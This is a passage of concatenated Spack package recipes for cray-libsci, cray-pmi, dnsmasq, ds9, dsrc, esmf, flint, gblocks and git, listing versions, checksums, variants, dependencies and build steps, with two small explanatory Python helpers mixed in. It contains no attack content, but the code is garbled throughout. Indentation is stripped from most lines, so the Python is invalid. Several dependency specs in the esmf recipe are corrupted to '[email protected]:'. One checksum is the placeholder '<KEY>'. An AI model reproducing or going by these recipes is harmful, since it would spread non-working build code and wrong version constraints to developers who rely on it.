has_code = False # Skip attempts to fetch source that is not available
version("21.08.1.2")
version("20.06.1")
version("20.03.1")
version("19.06.1")
version("18.12.1")
version("18.11.1.2")
version("16.11.1")
version("16.09.1")
    version("16.07.1")
version("16.06.1")
version("16.03.1")
variant("shared", default=True, description="enable shared libs")
variant("openmp", default=False, description="link with openmp")
variant("mpi", default=False, description="link with mpi libs")
provides("blas")
provides("lapack")
provides("scalapack", when="+mpi")
canonical_names = {
'gcc': 'GNU',
'cce': 'CRAY',
'intel': 'INTEL',
'clang': 'ALLINEA',
'aocc': 'AOCC',
'nvhpc': 'NVIDIA',
'rocmcc': 'AMD'
}
@property
def modname(self):
return "cray-libsci/{0}".format(self.version)
@property
def external_prefix(self):
libsci_module = module("show", self.modname).splitlines()
for line in libsci_module:
if "CRAY_LIBSCI_PREFIX_DIR" in line:
return get_path_args_from_module_line(line)[0]
@property
def blas_libs(self):
        shared = "+shared" in self.spec
        compiler = self.spec.compiler.name
        if "+openmp" in self.spec and "+mpi" in self.spec:
            lib = ["libsci_{0}_mpi_mp", "libsci_{0}_mp"]
        elif "+openmp" in self.spec:
            lib = ["libsci_{0}_mp"]
        elif "+mpi" in self.spec:
            lib = ["libsci_{0}_mpi", "libsci_{0}"]
        else:
            lib = ["libsci_{0}"]
libname = []
for lib_fmt in lib:
libname.append(lib_fmt.format(self.canonical_names[compiler].lower()))
return find_libraries(
libname,
root=self.prefix.lib,
shared=shared,
recursive=False)
@property
def lapack_libs(self):
return self.blas_libs
@property
def scalapack_libs(self):
return self.blas_libs
@property
def libs(self):
return self.blas_libs
def install(self, spec, prefix):
raise InstallError(
self.spec.format('{name} is not installable, you need to specify '
'it as an external package in packages.yaml'))
```
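The `blas_libs` property boils down to choosing library basenames from the compiler name and the `+openmp`/`+mpi` variants. The same selection as a pure function, using the canonical compiler names from the table above:
```python
# Variant-driven selection of LibSci library basenames, mirroring the
# blas_libs property above as a standalone function.
def libsci_names(compiler, openmp=False, mpi=False):
    if openmp and mpi:
        templates = ["libsci_{0}_mpi_mp", "libsci_{0}_mp"]
    elif openmp:
        templates = ["libsci_{0}_mp"]
    elif mpi:
        templates = ["libsci_{0}_mpi", "libsci_{0}"]
    else:
        templates = ["libsci_{0}"]
    return [t.format(compiler.lower()) for t in templates]

print(libsci_names('GNU', openmp=True, mpi=True))
# ['libsci_gnu_mpi_mp', 'libsci_gnu_mp']
print(libsci_names('CRAY'))
# ['libsci_cray']
```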
#### File: packages/cray-pmi/package.py
```python
from spack.package import *
class CrayPmi(Package):
"""Cray's Process Management Interface library"""
homepage = "https://docs.nersc.gov/development/compilers/wrappers/"
has_code = False # Skip attempts to fetch source that is not available
maintainers = ['haampie']
version('5.0.17')
version('5.0.16')
version('5.0.11')
@property
def headers(self):
return find_headers('pmi', self.prefix.include, recursive=True)
@property
def libs(self):
return find_libraries(['libpmi'], root=self.prefix, recursive=True)
```
#### File: packages/dnsmasq/package.py
```python
from spack.package import *
class Dnsmasq(MakefilePackage):
"""A lightweight, caching DNS proxy with integrated DHCP server."""
homepage = "https://www.thekelleys.org.uk/dnsmasq/doc.html"
url = "http://www.thekelleys.org.uk/dnsmasq/dnsmasq-2.70.tar.gz"
version('2.81', sha256='3c28c68c6c2967c3a96e9b432c0c046a5df17a426d3a43cffe9e693cf05804d0')
version('2.80', sha256='9e4a58f816ce0033ce383c549b7d4058ad9b823968d352d2b76614f83ea39adc')
version('2.79', sha256='77512dd6f31ffd96718e8dcbbf54f02c083f051d4cca709bd32540aea269f789')
version('2.78', sha256='c92e5d78aa6353354d02aabf74590d08980bb1385d8a00b80ef9bc80430aa1dc')
version('2.77', sha256='ae97a68c4e64f07633f31249eb03190d673bdb444a05796a3a2d3f521bfe9d38')
version('2.76', sha256='777c4762d2fee3738a0380401f2d087b47faa41db2317c60660d69ad10a76c32')
version('2.75', sha256='f8252c0a0ba162c2cd45f81140c7c17cc40a5fca2b869d1a420835b74acad294')
version('2.74', sha256='27b95a8b933d7eb88e93a4c405b808d09268246d4e108606e423ac518aede78f')
version('2.73', sha256='9f350f74ae2c7990b1c7c6c8591d274c37b674aa987f54dfee7ca856fae0d02d')
version('2.72', sha256='635f1b47417d17cf32e45cfcfd0213ac39fd09918479a25373ba9b2ce4adc05d')
version('2.71', sha256='7d8c64f66a396442e01b639df3ea6b4e02ba88cbe206c80be8de68b6841634c4')
version('2.70', sha256='8eb7bf53688d6aaede5c90cfd2afcce04803a4efbddfbeecc6297180749e98af')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('./src/dnsmasq', prefix.bin)
```
#### File: packages/ds/package.py
```python
from os import symlink
from spack.package import *
class Ds(AutotoolsPackage):
"""SAOImage DS9 is an astronomical imaging and data visualization
application."""
homepage = "https://ds9.si.edu/"
url = "http://ds9.si.edu/download/source/ds9.8.0.tar.gz"
version('9.8.0', sha256='f3bdb46c1653997202f98c6f76632a4eb444707f4b64c14f8b96863d9c890304')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('m4', type='build')
depends_on('libtool', type='build')
depends_on('libx11')
depends_on('libxml2')
depends_on('libxslt')
depends_on('openssl')
depends_on('tcl')
depends_on('tcl-tclxml')
depends_on('tk')
def patch(self):
        # the package provides its own TCL utilities
# compiling and manually setting paths for all of them is contrived
# (most of the utilities are small and not included in spack)
# inject libxml, libxslt prefixes into configure search paths
filter_file('/usr/bin/xml2-config',
join_path(self.spec['libxml2'].prefix, 'bin/xml2-config'),
'tclxml/configure', string=True)
filter_file('/usr/bin/xslt-config',
join_path(self.spec['libxslt'].prefix, 'bin/xslt-config'),
'tclxml/configure', string=True)
# symlink the master configure script into the source directory
symlink('unix/configure', 'configure')
def configure_args(self):
srcdir = join_path(self.stage.source_path, 'unix')
return ['--srcdir={0}'.format(srcdir)]
def install(self, spec, prefix):
# no install target provided in Makefile, install manually
install_tree('bin', prefix.bin)
install_tree('share', prefix.share)
install_tree('lib', prefix.lib)
```
#### File: packages/dsrc/package.py
```python
from spack.package import *
class Dsrc(MakefilePackage):
"""DNA Sequence Reads Compression is an application designed for
compression of data files containing reads from DNA sequencing in
FASTQ format."""
homepage = "http://sun.aei.polsl.pl/dsrc"
url = "https://github.com/refresh-bio/DSRC/archive/v2.0.2.tar.gz"
version('2.0.2', sha256='6d7abe0d72a501054a2115ccafff2e85e6383de627ec3e94ff4f03b7bb96a806')
parallel = False
def install(self, spec, prefix):
install_tree('bin', prefix.bin)
install_tree('lib', prefix.lib)
install_tree('include', prefix.include)
install_tree('examples', prefix.examples)
```
#### File: packages/esmf/package.py
```python
import os
import spack.compiler
from spack.package import *
class Esmf(MakefilePackage):
"""The Earth System Modeling Framework (ESMF) is high-performance, flexible
software infrastructure for building and coupling weather, climate, and
related Earth science applications. The ESMF defines an architecture for
composing complex, coupled modeling systems and includes data structures
and utilities for developing individual models."""
homepage = "https://www.earthsystemcog.org/projects/esmf/"
url = 'https://github.com/esmf-org/esmf/archive/ESMF_8_0_1.tar.gz'
maintainers = ['climbfuji']
version('8.2.0', sha256='3693987aba2c8ae8af67a0e222bea4099a48afe09b8d3d334106f9d7fc311485')
version('8.1.1', sha256='58c2e739356f21a1b32673aa17a713d3c4af9d45d572f4ba9168c357d586dc75')
version('8.0.1', sha256='9172fb73f3fe95c8188d889ee72fdadb4f978b1d969e1d8e401e8d106def1d84')
version('8.0.0', sha256='051dca45f9803d7e415c0ea146df15ce487fb55f0fce18ca61d96d4dba0c8774')
version('7.1.0r', sha256='<KEY>')
variant('mpi', default=True, description='Build with MPI support')
variant('external-lapack', default=False, description='Build with external LAPACK support')
variant('netcdf', default=True, description='Build with NetCDF support')
variant('pnetcdf', default=True, description='Build with pNetCDF support')
variant('xerces', default=True, description='Build with Xerces support')
variant('pio', default=True, description='Enable ParallelIO support')
variant('debug', default=False, description='Make a debuggable version of the library')
# Required dependencies
depends_on('zlib')
depends_on('libxml2')
# Optional dependencies
depends_on('mpi', when='+mpi')
depends_on('lapack@3:', when='+external-lapack')
depends_on('[email protected]:', when='+netcdf')
depends_on('[email protected]:', when='+netcdf')
depends_on('[email protected]:', when='+pnetcdf')
depends_on('[email protected]:', when='+xerces')
# Testing dependencies
depends_on('perl', type='test')
# Make esmf build with newer intel versions
patch('intel.patch', when='@:7.0 %intel@17:')
# Make esmf build with newer gcc versions
# https://sourceforge.net/p/esmf/esmf/ci/3706bf758012daebadef83d6575c477aeff9c89b/
patch('gcc.patch', when='@:7.0 %gcc@6:')
# Fix undefined reference errors with mvapich2
# https://sourceforge.net/p/esmf/esmf/ci/34de0ccf556ba75d35c9687dae5d9f666a1b2a18/
patch('mvapich2.patch', when='@:7.0')
# Allow different directories for creation and
# installation of dynamic libraries on OSX:
patch('darwin_dylib_install_name.patch', when='platform=darwin @:7.0')
# Missing include file for newer gcc compilers
# https://trac.macports.org/ticket/57493
patch('cstddef.patch', when='@7.1.0r %gcc@8:')
# Make script from mvapich2.patch executable
@when('@:7.0')
@run_before('build')
def chmod_scripts(self):
chmod = which('chmod')
chmod('+x', 'scripts/libs.mvapich2f90')
def url_for_version(self, version):
if version < Version('8.0.0'):
return "http://www.earthsystemmodeling.org/esmf_releases/public/ESMF_{0}/esmf_{0}_src.tar.gz".format(version.underscored)
else:
return "https://github.com/esmf-org/esmf/archive/ESMF_{0}.tar.gz".format(version.underscored)
def edit(self, spec, prefix):
# Installation instructions can be found at:
# http://www.earthsystemmodeling.org/esmf_releases/last_built/ESMF_usrdoc/node9.html
# Unset any environment variables that may influence the installation.
for var in os.environ:
if var.startswith('ESMF_'):
os.environ.pop(var)
######################################
# Build and Installation Directories #
######################################
# The environment variable ESMF_DIR must be set to the full pathname
# of the top level ESMF directory before building the framework.
os.environ['ESMF_DIR'] = os.getcwd()
# This variable specifies the prefix of the installation path used
# with the install target.
os.environ['ESMF_INSTALL_PREFIX'] = prefix
# Installation subdirectories default to:
# bin/binO/Linux.gfortran.64.default.default
os.environ['ESMF_INSTALL_BINDIR'] = 'bin'
os.environ['ESMF_INSTALL_LIBDIR'] = 'lib'
os.environ['ESMF_INSTALL_MODDIR'] = 'include'
# Allow compiler flags to carry through from compiler spec
os.environ['ESMF_CXXCOMPILEOPTS'] = \
' '.join(spec.compiler_flags['cxxflags'])
os.environ['ESMF_F90COMPILEOPTS'] = \
' '.join(spec.compiler_flags['fflags'])
        # ESMF will simply not build with Intel when it is backed by GCC 8;
        # in that case you need to point it at an older GCC. The
        # commented-out lines below show an example.
# os.environ['ESMF_CXXCOMPILEOPTS'] = \
# '-O2 -std=c++11 -gcc-name=/usr/bin/gcc'
# os.environ['ESMF_F90COMPILEOPTS'] = \
# '-O2 -gcc-name=/usr/bin/gcc'
############
# Compiler #
############
# ESMF_COMPILER must be set to select which Fortran and
# C++ compilers are being used to build the ESMF library.
if self.compiler.name == 'gcc':
os.environ['ESMF_COMPILER'] = 'gfortran'
gfortran_major_version = int(spack.compiler.get_compiler_version_output(
self.compiler.fc, '-dumpversion').split('.')[0])
elif self.compiler.name == 'intel':
os.environ['ESMF_COMPILER'] = 'intel'
elif self.compiler.name in ['clang', 'apple-clang']:
os.environ['ESMF_COMPILER'] = 'gfortranclang'
gfortran_major_version = int(spack.compiler.get_compiler_version_output(
self.compiler.fc, '-dumpversion').split('.')[0])
elif self.compiler.name == 'nag':
os.environ['ESMF_COMPILER'] = 'nag'
elif self.compiler.name == 'pgi':
os.environ['ESMF_COMPILER'] = 'pgi'
else:
msg = "The compiler you are building with, "
msg += "'{0}', is not supported by ESMF."
raise InstallError(msg.format(self.compiler.name))
if '+mpi' in spec:
os.environ['ESMF_CXX'] = spec['mpi'].mpicxx
os.environ['ESMF_F90'] = spec['mpi'].mpifc
else:
os.environ['ESMF_CXX'] = os.environ['CXX']
os.environ['ESMF_F90'] = os.environ['FC']
# This environment variable controls the build option.
if '+debug' in spec:
# Build a debuggable version of the library.
os.environ['ESMF_BOPT'] = 'g'
else:
# Build an optimized version of the library.
os.environ['ESMF_BOPT'] = 'O'
if self.compiler.name in ['gcc', 'clang', 'apple-clang'] and \
gfortran_major_version >= 10:
os.environ['ESMF_F90COMPILEOPTS'] = '-fallow-argument-mismatch'
#######
# OS #
#######
# ESMF_OS must be set for Cray systems
if 'platform=cray' in self.spec:
os.environ['ESMF_OS'] = 'Unicos'
#######
# MPI #
#######
# ESMF_COMM must be set to indicate which MPI implementation
# is used to build the ESMF library.
if '+mpi' in spec:
if 'platform=cray' in self.spec:
os.environ['ESMF_COMM'] = 'mpi'
elif '^mvapich2' in spec:
os.environ['ESMF_COMM'] = 'mvapich2'
elif '^mpich' in spec:
# [email protected] does not include configs for mpich3,
# so we start with the configs for mpich2:
os.environ['ESMF_COMM'] = 'mpich2'
# The mpich 3 series split apart the Fortran and C bindings,
# so we link the Fortran libraries when building C programs:
os.environ['ESMF_CXXLINKLIBS'] = '-lmpifort'
elif '^openmpi' in spec or \
'^hpcx-mpi' in spec:
os.environ['ESMF_COMM'] = 'openmpi'
elif '^intel-parallel-studio+mpi' in spec or \
'^intel-mpi' in spec or \
'^intel-oneapi-mpi' in spec:
os.environ['ESMF_COMM'] = 'intelmpi'
else:
# Force use of the single-processor MPI-bypass library.
os.environ['ESMF_COMM'] = 'mpiuni'
##########
# LAPACK #
##########
if '+external-lapack' in spec:
# A system-dependent external LAPACK/BLAS installation is used
# to satisfy the external dependencies of the LAPACK-dependent
# ESMF code.
os.environ['ESMF_LAPACK'] = 'system'
# FIXME: determine whether or not we need to set this
# Specifies the path where the LAPACK library is located.
# os.environ['ESMF_LAPACK_LIBPATH'] = spec['lapack'].prefix.lib
# Specifies the linker directive needed to link the LAPACK library
# to the application.
os.environ['ESMF_LAPACK_LIBS'] = spec['lapack'].libs.link_flags # noqa
else:
os.environ['ESMF_LAPACK'] = 'internal'
##########
# NetCDF #
##########
if '+netcdf' in spec:
# ESMF provides the ability to read Grid and Mesh data in
# NetCDF format.
if spec.satisfies('^[email protected]:'):
# ESMF_NETCDF_LIBS will be set to "-lnetcdff -lnetcdf".
                # This option is useful for systems which have the Fortran
                # and C bindings archived in separate library files.
os.environ['ESMF_NETCDF'] = 'split'
else:
# ESMF_NETCDF_LIBS will be set to "-lnetcdf".
# This option is useful when the Fortran and C bindings
# are archived together in the same library file.
os.environ['ESMF_NETCDF'] = 'standard'
# FIXME: determine whether or not we need to set these.
# ESMF_NETCDF_INCLUDE
# ESMF_NETCDF_LIBPATH
###################
# Parallel-NetCDF #
###################
if '+pnetcdf' in spec:
# ESMF provides the ability to write Mesh weights
# using Parallel-NetCDF.
# When defined, enables the use of Parallel-NetCDF.
# ESMF_PNETCDF_LIBS will be set to "-lpnetcdf".
os.environ['ESMF_PNETCDF'] = 'standard'
# FIXME: determine whether or not we need to set these.
# ESMF_PNETCDF_INCLUDE
# ESMF_PNETCDF_LIBPATH
##############
# ParallelIO #
##############
if '+pio' in spec and '+mpi' in spec:
# ESMF provides the ability to read and write data in both binary
# and NetCDF formats through ParallelIO (PIO), a third-party IO
# software library that is integrated in the ESMF library.
# PIO-dependent features will be enabled and will use the
# PIO library that is included and built with ESMF.
os.environ['ESMF_PIO'] = 'internal'
else:
# Disables PIO-dependent code.
os.environ['ESMF_PIO'] = 'OFF'
##########
# XERCES #
##########
if '+xerces' in spec:
# ESMF provides the ability to read Attribute data in
# XML file format via the XERCES C++ library.
# ESMF_XERCES_LIBS will be set to "-lxerces-c".
os.environ['ESMF_XERCES'] = 'standard'
# FIXME: determine if the following are needed
# ESMF_XERCES_INCLUDE
# ESMF_XERCES_LIBPATH
def check(self):
make('check', parallel=False)
def setup_dependent_build_environment(self, env, dependent_spec):
env.set('ESMFMKFILE', os.path.join(self.prefix.lib, 'esmf.mk'))
def setup_run_environment(self, env):
env.set('ESMFMKFILE', os.path.join(self.prefix.lib, 'esmf.mk'))
```
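The `ESMF_COMM` branch above is effectively a first-match lookup from spec fragments to a communication layer. A minimal, self-contained sketch of that selection logic (the `esmf_comm` helper and the plain-string spec model are illustrative assumptions, and the table is trimmed to a few providers):
```python
# Sketch: first-match mapping from MPI-provider spec fragments to ESMF_COMM.
# In the real package the spec is a Spack Spec object, not a string.
MPI_TO_ESMF_COMM = [
    ('platform=cray', 'mpi'),
    ('^mvapich2', 'mvapich2'),
    ('^mpich', 'mpich2'),      # the mpich 3 series reuses the mpich2 configs
    ('^openmpi', 'openmpi'),
    ('^hpcx-mpi', 'openmpi'),
    ('^intel-mpi', 'intelmpi'),
]

def esmf_comm(spec):
    """Return ESMF_COMM for the first matching fragment, falling back
    to the single-processor MPI-bypass library."""
    for fragment, comm in MPI_TO_ESMF_COMM:
        if fragment in spec:
            return comm
    return 'mpiuni'

assert esmf_comm('esmf+mpi ^openmpi') == 'openmpi'
assert esmf_comm('esmf~mpi') == 'mpiuni'
```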
#### File: packages/flint/package.py
```python
from spack.package import *
class Flint(Package):
"""FLINT (Fast Library for Number Theory)."""
homepage = "https://www.flintlib.org"
url = "https://mirrors.mit.edu/sage/spkg/upstream/flint/flint-2.5.2.tar.gz"
git = "https://github.com/wbhart/flint2.git"
version('develop', branch='trunk')
version('2.5.2', sha256='cbf1fe0034533c53c5c41761017065f85207a1b770483e98b2392315f6575e87')
version('2.4.5', sha256='e489354df00f0d84976ccdd0477028693977c87ccd14f3924a89f848bb0e01e3')
# Overlap in functionality between gmp and mpir
# All other dependencies must also be built with
# one or the other
# variant('mpir', default=False,
# description='Compile with the MPIR library')
# Build dependencies
depends_on('autoconf', type='build')
# Other dependencies
depends_on('gmp') # mpir is a drop-in replacement for this
depends_on('mpfr') # Could also be built against mpir
def install(self, spec, prefix):
options = []
options = ["--prefix=%s" % prefix,
"--with-gmp=%s" % spec['gmp'].prefix,
"--with-mpfr=%s" % spec['mpfr'].prefix]
# if '+mpir' in spec:
# options.extend([
# "--with-mpir=%s" % spec['mpir'].prefix
# ])
configure(*options)
make()
if self.run_tests:
make("check")
make("install")
```
#### File: packages/gblocks/package.py
```python
from spack.package import *
class Gblocks(Package):
"""Gblocks is a computer program written in ANSI C language that eliminates
poorly aligned positions and divergent regions of an alignment of DNA or
protein sequences"""
homepage = "http://molevol.cmima.csic.es/castresana/Gblocks.html"
url = "http://molevol.cmima.csic.es/castresana/Gblocks/Gblocks_Linux64_0.91b.tar.Z"
version('0.91b', sha256='563658f03cc5e76234a8aa705bdc149398defec813d3a0c172b5f94c06c880dc')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('Gblocks', prefix.bin)
```
#### File: packages/git/package.py
```python
import os
import re
from spack.package import *
class Git(AutotoolsPackage):
"""Git is a free and open source distributed version control
system designed to handle everything from small to very large
projects with speed and efficiency.
"""
homepage = "http://git-scm.com"
url = "https://mirrors.edge.kernel.org/pub/software/scm/git/git-2.12.0.tar.gz"
maintainers = ['jennfshr']
tags = ['build-tools']
executables = ['^git$']
# Every new git release comes with a corresponding manpage resource:
# https://www.kernel.org/pub/software/scm/git/git-manpages-{version}.tar.gz
# https://mirrors.edge.kernel.org/pub/software/scm/git/sha256sums.asc
version('2.36.1', sha256='37d936fd17c81aa9ddd3dba4e56e88a45fa534ad0ba946454e8ce818760c6a2c')
version('2.35.2', sha256='0decc02a47e792f522df3183c38a61ad8fbb38927502ca6781467a6599a888cb')
version('2.35.1', sha256='9845a37dd01f9faaa7d8aa2078399d3aea91b43819a5efea6e2877b0af09bd43', deprecated=True)
version('2.35.0', sha256='c1d0adc777a457a3d9b2759024f173b34e61be96f7480ac5bc44216617834412', deprecated=True)
version('2.34.1', sha256='fc4eb5ecb9299db91cdd156c06cdeb41833f53adc5631ddf8c0cb13eaa2911c1', deprecated=True)
version('2.34.0', sha256='0ce6222bfd31938b29360150286b51c77c643fa97740b1d35b6d1ceef8b0ecd7', deprecated=True)
version('2.33.1', sha256='02047f8dc8934d57ff5e02aadd8a2fe8e0bcf94a7158da375e48086cc46fce1d', deprecated=True)
version('2.33.0', sha256='02d909d0bba560d3a1008bd00dd577621ffb57401b09175fab2bf6da0e9704ae', deprecated=True)
version('2.32.0', sha256='6038f06d396ba9dab2eee541c7db6e7f9f847f181ec62f3d8441893f8c469398', deprecated=True)
version('2.31.1', sha256='46d37c229e9d786510e0c53b60065704ce92d5aedc16f2c5111e3ed35093bfa7', deprecated=True)
version('2.31.0', sha256='bc6168777883562569144d536e8a855b12d25d46870d95188a3064260d7784ee', deprecated=True)
version('2.30.1', sha256='23a3e53f0d2dd3e62a8147b24a1a91d6ffe95b92123ef4dbae04e9a6205e71c0', deprecated=True)
version('2.30.0', sha256='d24c4fa2a658318c2e66e25ab67cc30038a35696d2d39e6b12ceccf024de1e5e', deprecated=True)
version('2.29.2', sha256='869a121e1d75e4c28213df03d204156a17f02fce2dc77be9795b327830f54195', deprecated=True)
version('2.29.0', sha256='fa08dc8424ef80c0f9bf307877f9e2e49f1a6049e873530d6747c2be770742ff', deprecated=True)
version('2.28.0', sha256='f914c60a874d466c1e18467c864a910dd4ea22281ba6d4d58077cb0c3f115170', deprecated=True)
version('2.27.0', sha256='77ded85cbe42b1ffdc2578b460a1ef5d23bcbc6683eabcafbb0d394dffe2e787', deprecated=True)
version('2.26.0', sha256='aa168c2318e7187cd295a645f7370cc6d71a324aafc932f80f00c780b6a26bed', deprecated=True)
version('2.25.0', sha256='a98c9b96d91544b130f13bf846ff080dda2867e77fe08700b793ab14ba5346f6', deprecated=True)
version('2.23.0', sha256='e3396c90888111a01bf607346db09b0fbf49a95bc83faf9506b61195936f0cfe', deprecated=True)
version('2.22.0', sha256='a4b7e4365bee43caa12a38d646d2c93743d755d1cea5eab448ffb40906c9da0b', deprecated=True)
version('2.21.0', sha256='85eca51c7404da75e353eba587f87fea9481ba41e162206a6f70ad8118147bee', deprecated=True)
version('2.20.1', sha256='edc3bc1495b69179ba4e272e97eff93334a20decb1d8db6ec3c19c16417738fd', deprecated=True)
version('2.19.2', sha256='db893ad69c9ac9498b09677c5839787eba2eb3b7ef2bc30bfba7e62e77cf7850', deprecated=True)
version('2.19.1', sha256='ec4dc96456612c65bf6d944cee9ac640145ec7245376832b781cb03e97cbb796', deprecated=True)
version('2.18.0', sha256='94faf2c0b02a7920b0b46f4961d8e9cad08e81418614102898a55f980fa3e7e4', deprecated=True)
version('2.17.1', sha256='ec6452f0c8d5c1f3bcceabd7070b8a8a5eea11d4e2a04955c139b5065fd7d09a', deprecated=True)
version('2.17.0', sha256='7a0cff35dbb14b77dca6924c33ac9fe510b9de35d5267172490af548ec5ee1b8', deprecated=True)
version('2.15.1', sha256='85fca8781a83c96ba6db384cc1aa6a5ee1e344746bafac1cbe1f0fe6d1109c84', deprecated=True)
version('2.14.1', sha256='01925349b9683940e53a621ee48dd9d9ac3f9e59c079806b58321c2cf85a4464', deprecated=True)
version('2.13.0', sha256='9f2fa8040ebafc0c2caae4a9e2cb385c6f16c0525bcb0fbd84938bc796372e80', deprecated=True)
version('2.12.2', sha256='d9c6d787a24670d7e5100db2367c250ad9756ef8084fb153a46b82f1d186f8d8', deprecated=True)
version('2.12.1', sha256='65d62d10caf317fc1daf2ca9975bdb09dbff874c92d24f9529d29a7784486b43', deprecated=True)
version('2.12.0', sha256='882f298daf582a07c597737eb4bbafb82c6208fe0e73c047defc12169c221a92', deprecated=True)
version('2.11.1', sha256='a1cdd7c820f92c44abb5003b36dc8cb7201ba38e8744802399f59c97285ca043', deprecated=True)
version('2.11.0', sha256='d3be9961c799562565f158ce5b836e2b90f38502d3992a115dfb653d7825fd7e', deprecated=True)
version('2.9.3', sha256='a252b6636b12d5ba57732c8469701544c26c2b1689933bd1b425e603cbb247c0', deprecated=True)
version('2.9.2', sha256='3cb09a3917c2d8150fc1708f3019cf99a8f0feee6cd61bba3797e3b2a85be9dc', deprecated=True)
version('2.9.1', sha256='c2230873bf77f93736473e6a06501bf93eed807d011107de6983dc015424b097', deprecated=True)
version('2.9.0', sha256='bff7560f5602fcd8e37669e0f65ef08c6edc996e4f324e4ed6bb8a84765e30bd', deprecated=True)
version('2.8.4', sha256='626e319f8a24fc0866167ea5f6bf3e2f38f69d6cb2e59e150f13709ca3ebf301', deprecated=True)
version('2.8.3', sha256='2dad50c758339d6f5235309db620e51249e0000ff34aa2f2acbcb84c2123ed09', deprecated=True)
version('2.8.2', sha256='a029c37ee2e0bb1efea5c4af827ff5afdb3356ec42fc19c1d40216d99e97e148', deprecated=True)
version('2.8.1', sha256='cfc66324179b9ed62ee02833f29d39935f4ab66874125a3ab9d5bb9055c0cb67', deprecated=True)
version('2.8.0', sha256='2c6eee5506237e0886df9973fd7938a1b2611ec93d07f64ed3447493ebac90d1', deprecated=True)
version('2.7.3', sha256='30d067499b61caddedaf1a407b4947244f14d10842d100f7c7c6ea1c288280cd', deprecated=True)
version('2.7.1', sha256='b4ab42798b7fb038eaefabb0c32ce9dbde2919103e5e2a35adc35dd46258a66f', deprecated=True)
for (_version, _sha256_manpage) in {
'2.36.1': '3fcd315976f06b54b0abb9c14d38c3d484f431ea4de70a706cc5dddc1799f4f7',
'2.35.2': '86e153bdd96edd8462cb7a5c57be1b2b670b033c18272b0aa2e6a102acce50be',
'2.35.1': 'd90da8b28fe0088519e0dc3c9f4bc85e429c7d6ccbaadcfe94aed47fb9c95504',
'2.35.0': 'c0408a1c944c8e481d7f507bd90a7ee43c34617a1a7af2d76a1898dcf44fa430',
'2.34.1': '220f1ed68582caeddf79c4db15e4eaa4808ec01fd11889e19232f0a74d7f31b0',
'2.34.0': 'fe66a69244def488306c3e05c1362ea53d8626d2a7e57cd7311df2dab1ef8356',
'2.33.1': '292b08ca1b79422ff478a6221980099c5e3c0a38aba39d952063eedb68e27d93',
'2.33.0': 'ba9cd0f29a3632a3b78f8ed2389f0780aa6e8fcbe258259d7c584920d19ed1f7',
'2.32.0': 'b5533c40ea1688231c0e2df51cc0d1c0272e17fe78a45ba6e60cb8f61fa4a53c',
'2.31.1': 'd330498aaaea6928b0abbbbb896f6f605efd8d35f23cbbb2de38c87a737d4543',
'2.31.0': 'a51b760c36be19113756839a9110b328a09abfff0d57f1c93ddac3974ccbc238',
'2.30.1': 'db323e1b242e9d0337363b1e538c8b879e4c46eedbf94d3bee9e65dab6d49138',
'2.30.0': 'e23035ae232c9a5eda57db258bc3b7f1c1060cfd66920f92c7d388b6439773a6',
'2.29.2': '68b258e6d590cb78e02c0df741bbaeab94cbbac6d25de9da4fb3882ee098307b',
'2.29.0': '8f3bf70ddb515674ce2e19572920a39b1be96af12032b77f1dd57898981fb151',
'2.28.0': '3cfca28a88d5b8112ea42322b797a500a14d0acddea391aed0462aff1ab11bf7',
'2.27.0': '414e4b17133e54d846f6bfa2479f9757c50e16c013eb76167a492ae5409b8947',
'2.26.0': 'c1ffaf0b4cd1e80a0eb0d4039e208c9d411ef94d5da44e38363804e1a7961218',
'2.25.0': '22b2380842ef75e9006c0358de250ead449e1376d7e5138070b9a3073ef61d44',
'2.23.0': 'a5b0998f95c2290386d191d34780d145ea67e527fac98541e0350749bf76be75',
'2.22.0': 'f6a5750dfc4a0aa5ec0c0cc495d4995d1f36ed47591c3941be9756c1c3a1aa0a',
'2.21.0': '14c76ebb4e31f9e55cf5338a04fd3a13bced0323cd51794ccf45fc74bd0c1080',
'2.20.1': 'e9c123463abd05e142defe44a8060ce6e9853dfd8c83b2542e38b7deac4e6d4c',
'2.19.2': '60334ecd59ee10319af4a7815174d10991d1afabacd3b3129d589f038bf25542',
'2.19.1': 'bd27f58dc90a661e3080b97365eb7322bfa185de95634fc59d98311925a7d894',
'2.18.0': '6cf38ab3ad43ccdcd6a73ffdcf2a016d56ab6b4b240a574b0bb96f520a04ff55',
'2.17.1': '9732053c1a618d2576c1751d0249e43702f632a571f84511331882beb360677d',
'2.17.0': '41b58c68e90e4c95265c75955ddd5b68f6491f4d57b2f17c6d68e60bbb07ba6a',
'2.15.1': '472454c494c9a7f50ad38060c3eec372f617de654b20f3eb3be59fc17a683fa1',
'2.14.1': '8c5810ce65d44cd333327d3a115c5b462712a2f81225d142e07bd889ad8dc0e0',
'2.13.0': 'e764721796cad175a4cf9a4afe7fb4c4fc57582f6f9a6e214239498e0835355b',
'2.12.2': '6e7ed503f1190734e57c9427df356b42020f125fa36ab0478777960a682adf50',
'2.12.1': '35e46b8acd529ea671d94035232b1795919be8f3c3a363ea9698f1fd08d7d061',
'2.12.0': '1f7733a44c59f9ae8dd321d68a033499a76c82046025cc2a6792299178138d65',
'2.11.1': 'ee567e7b0f95333816793714bb31c54e288cf8041f77a0092b85e62c9c2974f9',
'2.11.0': '437a0128acd707edce24e1a310ab2f09f9a09ee42de58a8e7641362012dcfe22',
'2.9.3': '8ea1a55b048fafbf0c0c6fcbca4b5b0f5e9917893221fc7345c09051d65832ce',
'2.9.2': 'ac5c600153d1e4a1c6494e250cd27ca288e7667ad8d4ea2f2386f60ba1b78eec',
'2.9.1': '324f5f173f2bd50b0102b66e474b81146ccc078d621efeb86d7f75e3c1de33e6',
'2.9.0': '35ba69a8560529aa837e395a6d6c8d42f4d29b40a3c1cc6e3dc69bb1faadb332',
'2.8.4': '953a8eadaf4ae96dbad2c3ec12384c677416843917ef83d94b98367ffd55afc0',
'2.8.3': '2dad50c758339d6f5235309db620e51249e0000ff34aa2f2acbcb84c2123ed09',
'2.8.2': '82d322211aade626d1eb3bcf3b76730bfdd2fcc9c189950fb0a8bdd69c383e2f',
'2.8.1': 'df46de0c172049f935cc3736361b263c5ff289b77077c73053e63ae83fcf43f4',
'2.8.0': '2c48902a69df3bec3b8b8f0350a65fd1b662d2f436f0e64d475ecd1c780767b6',
'2.7.3': '84b487c9071857ab0f15f11c4a102a583d59b524831cda0dc0954bd3ab73920b',
'2.7.1': '0313cf4d283336088883d8416692fb6c547512233e11dbf06e5b925b7e762d61'
}.items():
resource(
name='git-manpages',
